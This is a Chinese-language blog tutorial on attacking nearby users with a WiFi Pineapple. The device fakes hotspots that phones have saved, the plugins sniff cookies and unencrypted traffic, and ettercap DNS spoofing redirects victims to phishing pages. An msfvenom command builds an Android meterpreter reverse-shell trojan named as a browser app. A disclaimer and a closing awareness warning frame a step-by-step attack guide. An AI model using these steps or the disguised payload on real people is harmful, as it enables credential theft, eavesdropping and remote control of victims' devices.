使用 WifiPineApple 进行范围内 局域网钓鱼
声明:
仅供参考,勿用于非法用途,否则后果自负,与作者无关。
准备工作:
WifiPineApple,可以在上买一个汉化的。
两张无线网卡(支持监听模式的功能),推荐 RT3070L,便宜一些;如果有更大需求,可以买功率大一些的。
一个 USB 集线器,因为 PineApple 上只有一个 USB 接口。
KALI Linux 渗透操作系统。
在进入正题之前,我们需要了解一下 WiFiPineApple 这个设备:
在 WifiPineApple 下有这么一个功能:PineAP,它的功能可谓是强大:可以自动模拟手机曾经连接过的热点,也就是通过手机内的 /data/misc/wifi/wpa_supplicant.conf(存放手机记录的热点名称以及密码)文件,来创建 WiFi 热点的名称,它创建带密码 / 不带密码的 2 种,从而导致,附近的其他用户只要开启了 WiFi,就会自动连接到你的 PineApple 上。
下边说明实验的步骤:
0x01 连接 PineApple:
打开 PineApple,在设备的侧面有一个按钮,推到左侧是开启,右侧是充电宝模式,中间是关机。
**
插入网线或连接建立的热点(一般开机后需要等待 2 分钟左右),使用 web 的方式登陆 PineApple 的默认连接的地址为:http://172.16.42.1:1471
**
输入账号密码登陆(厂商提供默认口令)
我们看到以下的界面:
**
0x02 配置网络(重点):
在左侧的菜单栏中选择网络
**
在网络中我们可以看到当前网卡和 IP 地址获取的情况
**
我们需要做的配置是:一块网卡用于建立 PineAP 热点,一块网卡用于桥接其他网络,连接外网。还有一块网卡用于连接设备物理接口,和默认建立的 wifi (不能动)
最终达到这样的效果
**
0x03 进行一些嗅探和欺骗
PineApple 中有很多的插件,都可以进行对连接上的客户机,做一些 “手脚”,例如图片网址获取的功能,他可以获取到用户访问未被 SSL 加密的图片和一些网址的 URL、请求时提交的数据和 cookie 等。
当然,这些功能在 KALI 内手动进行实现,但是通过这个 web 的方式一键搭建,是不是很方便呢?
**
0x04 通过 KALI 来手动进行 dns 劫持,并且伪造钓鱼网页
启动 KALI Linux 虚拟机,并设置桥接网卡 我拿自己的有线网卡为例子
菜单栏下的编辑 -> 虚拟网络编辑器,选择使用桥接网卡,并桥接到自己的物理设备 (连接 PineApple 的设备)
**
配置 ip 地址,或者等待 dhcp 自动分配
可以 ping 通设备后,我们搭建一个 web 服务器 : service apache2 start
将钓鱼页面放置 /var/www/html 目录下
接下来,我们启动 ettercap 来进行 dns 欺骗 :
配置 ettercap 文件:
Vim /etc/Ettercap/etter.dns
**
修改为所有的域名都指向 也就是 KALI 的地址
启动 ettercap Ettercap -G
Ctrl+U 启动 网卡选择桥接到 PineApple 的网卡
**
管理插件,并将 dns 欺骗功能启用
**
这时用户访问的未加密的一些网页就会变成你的钓鱼页面,为了测试,做了一个简单的网页,
当然,如果想要更好的效果的话,可以找一个真实性更好的网页进行测试。
**
0x05 通过 msf 生成木马,远控手机或 PC。
msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=5555 > ~/360浏览器.apk
放在钓鱼页面上,等待用户 “上钩”.
具体的用法可以参考
附上我的几个成功的例子(在被允许的情况下)
**
当然,不止有这些功能,有什么好的想法都可以去尝试一下,不过要适度哦。
0x00 结语
引用我说说里说的话:没有什么是绝对安全的,连接即使是曾经连接过的 wifi 和确定之前连接是安全的 wifi 也是及其危险的,当攻击者伪造出你认为可靠的热点时,你连接了他,可能是主动去连接,也可能是被动去连接 (wifi 一直打开),就会造成信息的泄露,可能会透露你的个人信息:即使现在网络采用了 SSL 技术进行了加密传输,但是还是有相当一部分没有实现这项功能,所以,例如 QQ 号,还有网络浏览的一些信息以及照片,都可能被泄露,不重视网络安全,为了谋取一些利益的同时,忽视手机警告提示,甚至造成更严重的后果!!例如:下载未知绑定了木马的 app 可以被攻击者利用获取短信信息 (验证码)、联系人 (诈骗),甚至摄像头 (威胁),所以要提高安全意识,不要在公共场合轻易的连接 wifi,即使是你认为可靠的。